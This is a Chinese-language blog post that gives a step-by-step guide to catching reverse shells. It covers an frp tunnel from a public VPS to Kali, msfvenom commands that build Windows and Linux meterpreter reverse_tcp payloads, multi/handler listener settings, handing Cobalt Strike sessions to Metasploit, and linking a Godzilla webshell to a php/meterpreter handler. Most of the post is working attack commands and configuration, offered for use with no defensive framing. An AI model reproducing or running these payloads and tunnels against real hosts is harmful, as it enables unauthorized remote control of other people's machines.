Loading

MSF反弹shell、与CS_哥斯拉联动

0x00-引言#


看我不卷死你们.png

0x01-思路#


公网vps启动frp,本地kali启动frp客户端,frp客户端配置将kali端口映射到vps某个端口,msf生成木马接收shell

0x02-msf反弹shell#


01-frp配置#

frp客户端配置,将本地1234端口映射到vps1080

[common]
server_addr = 1.xx.xx.xx  #这里是公网vps的ip
server_port = 6666          #这里的端口要跟服务端的一样

[msf]
type = tcp
local_ip = 127.0.0.1        
local_port = 1234          # 转发给本地的1234端口
remote_port = 1080         #服务端的1080端口转发给本地的1234端口

image.png
启动服务端(没截图),启动客户端
image.png

02-上线windows主机#

msf生成windows木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=1080 -f exe > /root/hacker.exe

image.png
msf开启监听

msfconsole
use exploit/multi/handler  #开启监听
set payload windows/meterpreter/reverse_tcp  #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1  #本地IP,即攻击IP
set LPORT 1234  #监听端口
exploit  #攻击

windows10点击木马、成功上线
image.png
关闭木马进程

tasklist | findstr hacker
taskkill -f /pid 进程号

image.png

03-上线linux主机#

msf生成linux木马

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf

image.png
开启监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 8888
exploit  #攻击

image.png
加权限运行木马-成功上线
image.png
查找hacker服务进程并kill
image.png

0x03-cs与msf联动#


CS添加监听
image.png
kali msf设置监听

msfconsole
use exploit/multi/handler  #开启监听
set payload windows/meterpreter/reverse_http  #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1  #本地IP,即攻击IP
set LPORT 12345  #监听端口
exploit  #攻击

image.png
CS中转发shell
新建会话
image.png
选择payload
image.png
MSF成功接收到shell
image.png
msf吊啊,cs的进程都给杀掉了,msf的shell还没挂
image.png
cs显示已挂
image.png

0x04-msf与哥斯拉联动#


打开shell,如图
image.png
添加vps地址与端口,端口为kali映射的端口

use exploit/multi/handler #启用监听模块
set payload php/meterpreter/reverse_tcp #选择payload
set lhost 0.0.0.0
set lport 4444
run

image.png
成功
image.png

0x05-参考#


https://www.bilibili.com/read/cv13762388/
http://events.jianshu.io/p/02582b971eb1

posted @   美式加糖  阅读(1287)  评论(3编辑  收藏  举报
点击右上角即可分享
微信分享提示
主题色彩